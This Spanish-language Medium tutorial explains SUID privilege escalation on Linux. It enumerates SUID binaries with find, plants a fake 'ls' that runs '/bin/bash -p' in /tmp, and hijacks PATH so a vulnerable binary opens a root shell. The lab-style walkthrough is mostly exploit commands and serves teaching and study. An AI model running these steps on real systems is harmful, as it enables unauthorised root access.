← Back to list

Escalada de privilegios Suid

Supongamos que estamos dentro de la máquina que acabamos de vulnerar y necesitamos escalar a root, en este caso vamos a abusar de los SUID…

TheWhiteRabbit · 2026-01-30 20:16 · 0 claps · 1.6 min read
#suid #attack-suid #escalada-privilegios #privilege-escalation
Open on Medium ↗

Escalada de privilegios Suid

Supongamos que estamos dentro de la máquina que acabamos de vulnerar y necesitamos escalar a root, en este caso vamos a abusar de los SUID por lo que vamos a enumerar los binarios que tienen tales permisos.

find / -perm -4000 -type f 2>/dev/null

Como vemos en la imagen, nos salta uno llamado vuln, que no debería estar ahí y que nos llama la atención, por lo tanto será nuestro vector de ataque.

Examinamos el binario a ver qué es lo que hace, y como vemos hace un simple ls.

Creamos un directorio falso donde pondremos nuestro archivo modificado.

mkdir /tmp/falso

Ahora creamos nuestro ls modificado y malicioso para escalar privilegios ejecutando una bash con todos los permisos.

echo '/bin/bash -p' > /tmp/falso/ls

Y lo hacemos ejecutable:

chmod +x /tmp/falso/ls

Secuestraremos el PATH para que el sistema busque nuestro ls y lo ejecute en primer lugar.

export PATH=/tmp/falso:$PATH

Ahora solo tenemos que ejecutar el binario vuln y ya tendremos una terminal como root.


메타데이터
post_id
ef6ebe80340e
slug
escalada-de-privilegios-suid-ef6ebe80340e
url
https://medium.com/@M4rc0sX/escalada-de-privilegios-suid-ef6ebe80340e
canonical_url
https://medium.com/@M4rc0sX/escalada-de-privilegios-suid-ef6ebe80340e
author_url
https://medium.com/@M4rc0sX
status
ok
fetched_at
2026-07-15 21:32:05